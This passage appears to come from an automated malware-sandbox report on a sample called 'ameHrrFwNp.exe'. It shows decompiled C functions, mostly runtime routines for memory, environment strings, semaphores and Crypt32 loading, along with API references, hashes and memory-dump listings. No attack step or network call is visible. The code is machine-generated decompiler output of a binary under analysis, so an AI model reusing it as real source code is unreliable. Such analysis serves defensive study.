						_t9[2] = GetProcAddress(_t6, "CryptProtectMemory");
						_t6 = GetProcAddress( *_t9, "CryptUnprotectMemory");
						_t9[3] = _t6;
					}
					_t9[1] = 1;
					return _t6;
				}
				return _t5;
			}






              0x00d7e7e4
              0x00d7e7ea
              0x00d7e7f1
              0x00d7e7f6
              0x00d7e7fa
              0x00d7e80f
              0x00d7e812
              0x00d7e818
              0x00d7e818
              0x00d7e81b
              0x00000000
              0x00d7e81b
              0x00d7e820

              APIs
                • Part of subcall function 00D7FCFD: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D7FD18
                • Part of subcall function 00D7FCFD: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00D7E7F6,Crypt32.dll,?,00D7E878,?,00D7E85C,?,?,?,?), ref: 00D7FD3A
              • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00D7E802
              • GetProcAddress.KERNEL32(00DB7350,CryptUnprotectMemory), ref: 00D7E812
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: AddressProc$DirectoryLibraryLoadSystem
              • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
              • API String ID: 2141747552-1753850145
              • Opcode ID: 685e8ecaf3e41d3f40c2144dc876d2b03ad9826fffc14a113444e345e730b719
              • Instruction ID: 3f5f063ff66a08b7858eff0f8e5f4d8ec18b7b534f542c8675f68588da6b44c0
              • Opcode Fuzzy Hash: 685e8ecaf3e41d3f40c2144dc876d2b03ad9826fffc14a113444e345e730b719
              • Instruction Fuzzy Hash: 84E08CB1502B43EECB016B3ED808A21FBA4BF56B10F18C16AF428D3255EBB4D064CB70
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D97389, Relevance: 7.6, APIs: 5, Instructions: 129COMMON
              Download Yara Rule
              C-Code - Quality: 83%
              			E00D97389(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t28;
				signed int _t29;
				intOrPtr _t33;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				void* _t50;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int* _t81;
				signed int _t85;
				void* _t86;

				_t72 = __edx;
				_v12 = __ecx;
				_t28 =  *__ecx;
				_t81 =  *_t28;
				if(_t81 != 0) {
					_t29 =  *0xdad668; // 0x9e43e7e4
					_t56 =  *_t81 ^ _t29;
					_t78 = _t81[1] ^ _t29;
					_t83 = _t81[2] ^ _t29;
					asm("ror edi, cl");
					asm("ror esi, cl");
					asm("ror ebx, cl");
					if(_t78 != _t83) {
						L14:
						 *_t78 = E00D969A8( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_t33 = E00D8DB10(_t56);
						_t57 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
						_t24 = _t78 + 4; // 0x4
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E00D8DB10(_t24);
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E00D8DB10(_t83);
						_t37 = 0;
						L15:
						return _t37;
					}
					_t38 = 0x200;
					_t85 = _t83 - _t56 >> 2;
					if(_t85 <= 0x200) {
						_t38 = _t85;
					}
					_t80 = _t38 + _t85;
					if(_t80 == 0) {
						_t80 = 0x20;
					}
					if(_t80 < _t85) {
						L9:
						_push(4);
						_t80 = _t85 + 4;
						_push(_t80);
						_v8 = E00D9AC29(_t56);
						_t40 = E00D97A50(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							goto L11;
						}
						_t37 = _t40 | 0xffffffff;
						goto L15;
					} else {
						_push(4);
						_push(_t80);
						_v8 = E00D9AC29(_t56);
						E00D97A50(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							L11:
							_t56 = _t68;
							_v8 = _t68 + _t85 * 4;
							_t83 = _t68 + _t80 * 4;
							_t78 = _v8;
							_push(0x20);
							asm("ror eax, cl");
							_t71 = _t78;
							_v16 = 0 ^  *0xdad668;
							asm("sbb edx, edx");
							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
							_v8 = _t74;
							if(_t74 == 0) {
								goto L14;
							}
							_t75 = _v16;
							_t50 = 0;
							do {
								_t50 = _t50 + 1;
								 *_t71 = _t75;
								_t71 = _t71 + 4;
							} while (_t50 != _v8);
							goto L14;
						}
						goto L9;
					}
				}
				return _t28 | 0xffffffff;
			}

























              0x00d97389
              0x00d97393
              0x00d97397
              0x00d97399
              0x00d9739d
              0x00d973a7
              0x00d973b8
              0x00d973bd
              0x00d973bf
              0x00d973c1
              0x00d973c3
              0x00d973c5
              0x00d973c9
              0x00d97483
              0x00d97491
              0x00d97493
              0x00d97498
              0x00d9749f
              0x00d974a1
              0x00d974af
              0x00d974be
              0x00d974c1
              0x00d974c3
              0x00000000
              0x00d974c4
              0x00d973d1
              0x00d973d6
              0x00d973db
              0x00d973dd
              0x00d973dd
              0x00d973df
              0x00d973e4
              0x00d973e8
              0x00d973e8
              0x00d973eb
              0x00d9740a
              0x00d9740a
              0x00d9740c
              0x00d9740f
              0x00d97418
              0x00d9741b
              0x00d97420
              0x00d97423
              0x00d97428
              0x00000000
              0x00000000
              0x00d9742a
              0x00000000
              0x00d973ed
              0x00d973ed
              0x00d973ef
              0x00d973f8
              0x00d973fb
              0x00d97400
              0x00d97403
              0x00d97408
              0x00d97432
              0x00d97435
              0x00d97437
              0x00d9743a
              0x00d97442
              0x00d97448
              0x00d9744f
              0x00d97451
              0x00d97459
              0x00d97468
              0x00d9746c
              0x00d9746e
              0x00d97471
              0x00000000
              0x00000000
              0x00d97473
              0x00d97476
              0x00d97478
              0x00d97478
              0x00d97479
              0x00d9747b
              0x00d9747e
              0x00000000
              0x00d97478
              0x00000000
              0x00d97408
              0x00d973eb
              0x00000000

              APIs
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: _free
              • String ID:
              • API String ID: 269201875-0
              • Opcode ID: d33257dc9b5413c22928bee43db751f9a0f9ef1c71404ad7d01df845c9712280
              • Instruction ID: 1785b01023490644fceb0f07f3e1b12a6618b550cec0ee52208eeca81c31680a
              • Opcode Fuzzy Hash: d33257dc9b5413c22928bee43db751f9a0f9ef1c71404ad7d01df845c9712280
              • Instruction Fuzzy Hash: 0E41A136A103049FCF14DF78C881A9EB7B6EF89714B194569E515EB382D731ED01CBA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D9ABA6, Relevance: 7.6, APIs: 5, Instructions: 68COMMON
              Download Yara Rule
              C-Code - Quality: 93%
              			E00D9ABA6() {
				int _v8;
				void* __ecx;
				void* _t6;
				int _t7;
				char* _t13;
				int _t17;
				void* _t19;
				char* _t25;
				WCHAR* _t27;

				_t27 = GetEnvironmentStringsW();
				if(_t27 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t6 = E00D9AB6F(_t27);
					_pop(_t19);
					_t17 = _t6 - _t27 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t25 = E00D97A8A(_t19, _t7);
						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t25;
							_t25 = 0;
						}
						E00D97A50(_t25);
					}
				}
				if(_t27 != 0) {
					FreeEnvironmentStringsW(_t27);
				}
				return _t13;
			}












              0x00d9abb5
              0x00d9abbb
              0x00d9ac13
              0x00d9ac13
              0x00d9abbd
              0x00d9abbe
              0x00d9abc3
              0x00d9abcc
              0x00d9abd2
              0x00d9abd8
              0x00d9abdd
              0x00000000
              0x00d9abdf
              0x00d9abe5
              0x00d9abea
              0x00d9ac08
              0x00d9ac02
              0x00d9ac02
              0x00d9ac04
              0x00d9ac04
              0x00d9ac0b
              0x00d9ac10
              0x00d9abdd
              0x00d9ac17
              0x00d9ac1a
              0x00d9ac1a
              0x00d9ac28

              APIs
              • GetEnvironmentStringsW.KERNEL32 ref: 00D9ABAF
              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D9ABD2
                • Part of subcall function 00D97A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00D92FA6,?,0000015D,?,?,?,?,00D94482,000000FF,00000000,?,?), ref: 00D97ABC
              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00D9ABF8
              • _free.LIBCMT ref: 00D9AC0B
              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D9AC1A
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
              • String ID:
              • API String ID: 336800556-0
              • Opcode ID: e855c9389498e1c5183a9c880ceb541c71dae1a97f6e39614faf163fbef46485
              • Instruction ID: a13908051ad9e98ecdf6f614636e79e379141b57f700bad04a548b1ead98efcf
              • Opcode Fuzzy Hash: e855c9389498e1c5183a9c880ceb541c71dae1a97f6e39614faf163fbef46485
              • Instruction Fuzzy Hash: B70184776027257F2B2116BF6C8DD7F7A7DDAC7B603190129F904DA241EA61CD0182F6
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D9859A, Relevance: 7.6, APIs: 5, Instructions: 53COMMON
              Download Yara Rule
              C-Code - Quality: 82%
              			E00D9859A(void* __ecx, void* __edx) {
				void* __esi;
				intOrPtr _t2;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t16;
				long _t17;

				_t11 = __ecx;
				_t17 = GetLastError();
				_t10 = 0;
				_t2 =  *0xdad6ac; // 0x6
				_t20 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t16 = E00D97B1B(_t11, 1, 0x364);
					_pop(_t13);
					if(_t16 != 0) {
						_t4 = E00D99BA9(_t13, _t17, __eflags,  *0xdad6ac, _t16);
						__eflags = _t4;
						if(_t4 != 0) {
							E00D98388(_t13, _t16, 0xdd0418);
							E00D97A50(_t10);
							__eflags = _t16;
							if(_t16 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t16);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						E00D97A50();
						L8:
						SetLastError(_t17);
					}
				} else {
					_t16 = E00D99B53(_t11, _t17, _t20, _t2);
					if(_t16 != 0) {
						L9:
						SetLastError(_t17);
						_t10 = _t16;
					} else {
						goto L2;
					}
				}
				return _t10;
			}











              0x00d9859a
              0x00d985a5
              0x00d985a7
              0x00d985a9
              0x00d985ae
              0x00d985b1
              0x00d985bf
              0x00d985cb
              0x00d985ce
              0x00d985d1
              0x00d985e3
              0x00d985e8
              0x00d985ea
              0x00d985f5
              0x00d985fb
              0x00d98603
              0x00d98605
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00d985ec
              0x00d985ec
              0x00000000
              0x00d985ec
              0x00d985d3
              0x00d985d3
              0x00d985d4
              0x00d985d4
              0x00d98607
              0x00d98608
              0x00d98608
              0x00d985b3
              0x00d985b9
              0x00d985bd
              0x00d98610
              0x00d98611
              0x00d98617
              0x00000000
              0x00000000
              0x00000000
              0x00d985bd
              0x00d9861e

              APIs
              • GetLastError.KERNEL32(?,?,?,00D97ED1,00D97B6D,?,00D98544,00000001,00000364,?,00D92E0F,?,?,00DB00E0), ref: 00D9859F
              • _free.LIBCMT ref: 00D985D4
              • _free.LIBCMT ref: 00D985FB
              • SetLastError.KERNEL32(00000000,?,00DB00E0), ref: 00D98608
              • SetLastError.KERNEL32(00000000,?,00DB00E0), ref: 00D98611
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ErrorLast$_free
              • String ID:
              • API String ID: 3170660625-0
              • Opcode ID: e2554ee921eec606beacd265ed79e68d4f4480220f9e69149d580328b8423083
              • Instruction ID: e7a0f26d76cdda1ac85fabfc803a29ceed680aa75cc7a37b0c2ad9cb8490a9c7
              • Opcode Fuzzy Hash: e2554ee921eec606beacd265ed79e68d4f4480220f9e69149d580328b8423083
              • Instruction Fuzzy Hash: A301F4362087002BDF027B796C85A2B2669DBD3B7672A0128F80AD3353EE31CD05A179
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D803C7, Relevance: 7.5, APIs: 5, Instructions: 44COMMON
              Download Yara Rule
              C-Code - Quality: 82%
              			E00D803C7(void* __ecx) {
				intOrPtr _v16;
				void* __ebp;
				int _t16;
				void** _t21;
				long* _t25;
				void* _t28;
				void* _t30;
				intOrPtr _t31;

				_t22 = __ecx;
				_push(0xffffffff);
				_push(E00DA1161);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t31;
				_t28 = __ecx;
				E00D80697(__ecx);
				_t25 = 0;
				 *((char*)(__ecx + 0x314)) = 1;
				ReleaseSemaphore( *(__ecx + 0x318), 0x40, 0);
				if( *((intOrPtr*)(_t28 + 0x104)) > 0) {
					_t21 = _t28 + 4;
					do {
						E00D804BA(_t22, _t30,  *_t21);
						CloseHandle( *_t21);
						_t25 = _t25 + 1;
						_t21 =  &(_t21[1]);
					} while (_t25 <  *((intOrPtr*)(_t28 + 0x104)));
				}
				DeleteCriticalSection(_t28 + 0x320);
				CloseHandle( *(_t28 + 0x318));
				_t16 = CloseHandle( *(_t28 + 0x31c));
				 *[fs:0x0] = _v16;
				return _t16;
			}











              0x00d803c7
              0x00d803d0
              0x00d803d2
              0x00d803d7
              0x00d803d8
              0x00d803e2
              0x00d803e4
              0x00d803e9
              0x00d803eb
              0x00d803fb
              0x00d80407
              0x00d80409
              0x00d8040c
              0x00d8040e
              0x00d80415
              0x00d8041b
              0x00d8041c
              0x00d8041f
              0x00d8040c
              0x00d8042e
              0x00d8043a
              0x00d80446
              0x00d80451
              0x00d8045c

              APIs
                • Part of subcall function 00D80697: ResetEvent.KERNEL32(?), ref: 00D806A9
                • Part of subcall function 00D80697: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00D806BD
              • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00D803FB
              • CloseHandle.KERNEL32(?,?), ref: 00D80415
              • DeleteCriticalSection.KERNEL32(?), ref: 00D8042E
              • CloseHandle.KERNEL32(?), ref: 00D8043A
              • CloseHandle.KERNEL32(?), ref: 00D80446
                • Part of subcall function 00D804BA: WaitForSingleObject.KERNEL32(?,000000FF,00D805D9,?,?,00D8064E,?,?,?,?,?,00D80638), ref: 00D804C0
                • Part of subcall function 00D804BA: GetLastError.KERNEL32(?,?,00D8064E,?,?,?,?,?,00D80638), ref: 00D804CC
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
              • String ID:
              • API String ID: 1868215902-0
              • Opcode ID: 87b58191f4b08d4afeb2f206a335f465a397cd7aa41ebf5460bbb68e3f1e3045
              • Instruction ID: dc8456b6325396852504f715ee17b09199377d0bb5a849e7913063328638a5b0
              • Opcode Fuzzy Hash: 87b58191f4b08d4afeb2f206a335f465a397cd7aa41ebf5460bbb68e3f1e3045
              • Instruction Fuzzy Hash: 5701F532140704EFC721AB6DDC85BD6FFE9FB45710F000519F25A822A0C7752948CBB4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D9B461, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00D9B461(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0xdadd50; // 0xdadd44
					if(_t23 != 0) {
						E00D97A50(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0xdadd54; // 0xdd088c
					if(_t24 != 0) {
						E00D97A50(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0xdadd58; // 0xdd088c
					if(_t25 != 0) {
						E00D97A50(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0xdadd80; // 0xdadd48
					if(_t26 != 0) {
						E00D97A50(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0xdadd84; // 0xdd0890
					if(_t27 != 0) {
						return E00D97A50(_t6);
					}
				}
				return _t6;
			}










              0x00d9b467
              0x00d9b46c
              0x00d9b470
              0x00d9b476
              0x00d9b479
              0x00d9b47e
              0x00d9b482
              0x00d9b488
              0x00d9b48b
              0x00d9b490
              0x00d9b494
              0x00d9b49a
              0x00d9b49d
              0x00d9b4a2
              0x00d9b4a6
              0x00d9b4ac
              0x00d9b4af
              0x00d9b4b4
              0x00d9b4b5
              0x00d9b4b8
              0x00d9b4be
              0x00000000
              0x00d9b4c6
              0x00d9b4be
              0x00d9b4c9

              APIs
              • _free.LIBCMT ref: 00D9B479
                • Part of subcall function 00D97A50: RtlFreeHeap.NTDLL(00000000,00000000,?,00D9B4F8,?,00000000,?,00000000,?,00D9B51F,?,00000007,?,?,00D9B91C,?), ref: 00D97A66
                • Part of subcall function 00D97A50: GetLastError.KERNEL32(?,?,00D9B4F8,?,00000000,?,00000000,?,00D9B51F,?,00000007,?,?,00D9B91C,?,?), ref: 00D97A78
              • _free.LIBCMT ref: 00D9B48B
              • _free.LIBCMT ref: 00D9B49D
              • _free.LIBCMT ref: 00D9B4AF
              • _free.LIBCMT ref: 00D9B4C1
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: b4e0d18d2f2529f6d938b07a51378f7b792e56a1d1be5fdd5236b535ca15e87b
              • Instruction ID: 280416c758a60050b3b5de43ec1382db003ef2c787826a7a04b8fdef67f34e02
              • Opcode Fuzzy Hash: b4e0d18d2f2529f6d938b07a51378f7b792e56a1d1be5fdd5236b535ca15e87b
              • Instruction Fuzzy Hash: 11F0B232514710ABCF20EBB4F985C5E77DAEB017247695806F44EE7A51C734FD809A78
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D975DB, Relevance: 7.5, APIs: 5, Instructions: 30COMMON
              Download Yara Rule
              C-Code - Quality: 91%
              			E00D975DB(signed int __ecx) {
				intOrPtr _t7;

				asm("lock xadd [eax], ecx");
				if((__ecx | 0xffffffff) == 0) {
					_t7 =  *0xdadd40; // 0x10a2570
					if(_t7 != 0xdadb20) {
						E00D97A50(_t7);
						 *0xdadd40 = 0xdadb20;
					}
				}
				E00D97A50( *0xdd0410);
				 *0xdd0410 = 0;
				E00D97A50( *0xdd0414);
				 *0xdd0414 = 0;
				E00D97A50( *0xdd0860);
				 *0xdd0860 = 0;
				E00D97A50( *0xdd0864);
				 *0xdd0864 = 0;
				return 1;
			}




              0x00d975e4
              0x00d975e8
              0x00d975ea
              0x00d975f6
              0x00d975f9
              0x00d975ff
              0x00d975ff
              0x00d975f6
              0x00d9760b
              0x00d97618
              0x00d9761e
              0x00d97629
              0x00d9762f
              0x00d9763a
              0x00d97640
              0x00d97648
              0x00d97651

              APIs
              • _free.LIBCMT ref: 00D975F9
                • Part of subcall function 00D97A50: RtlFreeHeap.NTDLL(00000000,00000000,?,00D9B4F8,?,00000000,?,00000000,?,00D9B51F,?,00000007,?,?,00D9B91C,?), ref: 00D97A66
                • Part of subcall function 00D97A50: GetLastError.KERNEL32(?,?,00D9B4F8,?,00000000,?,00000000,?,00D9B51F,?,00000007,?,?,00D9B91C,?,?), ref: 00D97A78
              • _free.LIBCMT ref: 00D9760B
              • _free.LIBCMT ref: 00D9761E
              • _free.LIBCMT ref: 00D9762F
              • _free.LIBCMT ref: 00D97640
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: d404dee89d127e986d081e747707b706adf50f0c9f75cd6df11f5eedbcbca23a
              • Instruction ID: f85cf2b0e8bcc9fe2d2ce68bf1081bdc97d78bc365da242269afceae6ceb752a
              • Opcode Fuzzy Hash: d404dee89d127e986d081e747707b706adf50f0c9f75cd6df11f5eedbcbca23a
              • Instruction Fuzzy Hash: 65F030708163188B8F01BF65BC01A1E3FA5F787710B461117F116D6771C73006019BFA
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D96C73, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
              Download Yara Rule
              C-Code - Quality: 88%
              			E00D96C73(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t36;
				struct HINSTANCE__* _t37;
				struct HINSTANCE__* _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				CHAR* _t49;
				struct HINSTANCE__* _t50;
				void* _t52;
				struct HINSTANCE__* _t55;
				intOrPtr* _t59;
				struct HINSTANCE__* _t64;
				intOrPtr _t65;

				_t52 = __ecx;
				if(_a4 == 2 || _a4 == 1) {
					E00D9A7B3(_t52);
					GetModuleFileNameA(0, 0xdd02b8, 0x104);
					_t49 =  *0xdd0868; // 0x10932f0
					 *0xdd0870 = 0xdd02b8;
					if(_t49 == 0 ||  *_t49 == 0) {
						_t49 = 0xdd02b8;
					}
					_v8 = 0;
					_v16 = 0;
					E00D96D97(_t52, _t49, 0, 0,  &_v8,  &_v16);
					_t64 = E00D96F0C(_v8, _v16, 1);
					if(_t64 != 0) {
						E00D96D97(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
						if(_a4 != 1) {
							_v12 = 0;
							_push( &_v12);
							_t50 = E00D9A2CE(_t49, 0, _t64, _t64);
							if(_t50 == 0) {
								_t59 = _v12;
								_t55 = 0;
								_t36 = _t59;
								if( *_t59 == 0) {
									L15:
									_t37 = 0;
									 *0xdd085c = _t55;
									_v12 = 0;
									_t50 = 0;
									 *0xdd0860 = _t59;
									L16:
									E00D97A50(_t37);
									_v12 = 0;
									goto L17;
								} else {
									goto L14;
								}
								do {
									L14:
									_t36 = _t36 + 4;
									_t55 =  &(_t55->i);
								} while ( *_t36 != 0);
								goto L15;
							}
							_t37 = _v12;
							goto L16;
						}
						 *0xdd085c = _v8 - 1;
						_t43 = _t64;
						_t64 = 0;
						 *0xdd0860 = _t43;
						goto L10;
					} else {
						_t44 = E00D97ECC();
						_push(0xc);
						_pop(0);
						 *_t44 = 0;
						L10:
						_t50 = 0;
						L17:
						E00D97A50(_t64);
						return _t50;
					}
				} else {
					_t45 = E00D97ECC();
					_t65 = 0x16;
					 *_t45 = _t65;
					E00D97DAB();
					return _t65;
				}
			}





















              0x00d96c73
              0x00d96c80
              0x00d96ca0
              0x00d96cb3
              0x00d96cb9
              0x00d96cbf
              0x00d96cc7
              0x00d96cce
              0x00d96cce
              0x00d96cd3
              0x00d96cda
              0x00d96ce1
              0x00d96cf3
              0x00d96cfa
              0x00d96d19
              0x00d96d25
              0x00d96d40
              0x00d96d43
              0x00d96d4a
              0x00d96d50
              0x00d96d57
              0x00d96d5a
              0x00d96d5c
              0x00d96d60
              0x00d96d6a
              0x00d96d6a
              0x00d96d6c
              0x00d96d72
              0x00d96d75
              0x00d96d77
              0x00d96d7d
              0x00d96d7e
              0x00d96d84
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00d96d62
              0x00d96d62
              0x00d96d62
              0x00d96d65
              0x00d96d66
              0x00000000
              0x00d96d62
              0x00d96d52
              0x00000000
              0x00d96d52
              0x00d96d2b
              0x00d96d30
              0x00d96d32
              0x00d96d34
              0x00000000
              0x00d96cfc
              0x00d96cfc
              0x00d96d01
              0x00d96d03
              0x00d96d04
              0x00d96d39
              0x00d96d39
              0x00d96d87
              0x00d96d88
              0x00000000
              0x00d96d91
              0x00d96c88
              0x00d96c88
              0x00d96c8f
              0x00d96c90
              0x00d96c92
              0x00000000
              0x00d96c97

              APIs
              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\ameHrrFwNp.exe,00000104), ref: 00D96CB3
              • _free.LIBCMT ref: 00D96D7E
              • _free.LIBCMT ref: 00D96D88
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: _free$FileModuleName
              • String ID: C:\Users\user\Desktop\ameHrrFwNp.exe
              • API String ID: 2506810119-899430228
              • Opcode ID: f1e0ab8045a3d0367038975fc77f0a465b8fe371724f54e3bca17f795ebdc5a6
              • Instruction ID: 99d1bdf709e92744ce6e18dc2b21ab28ddc5a4ce5133f8c7a2c140314afea441
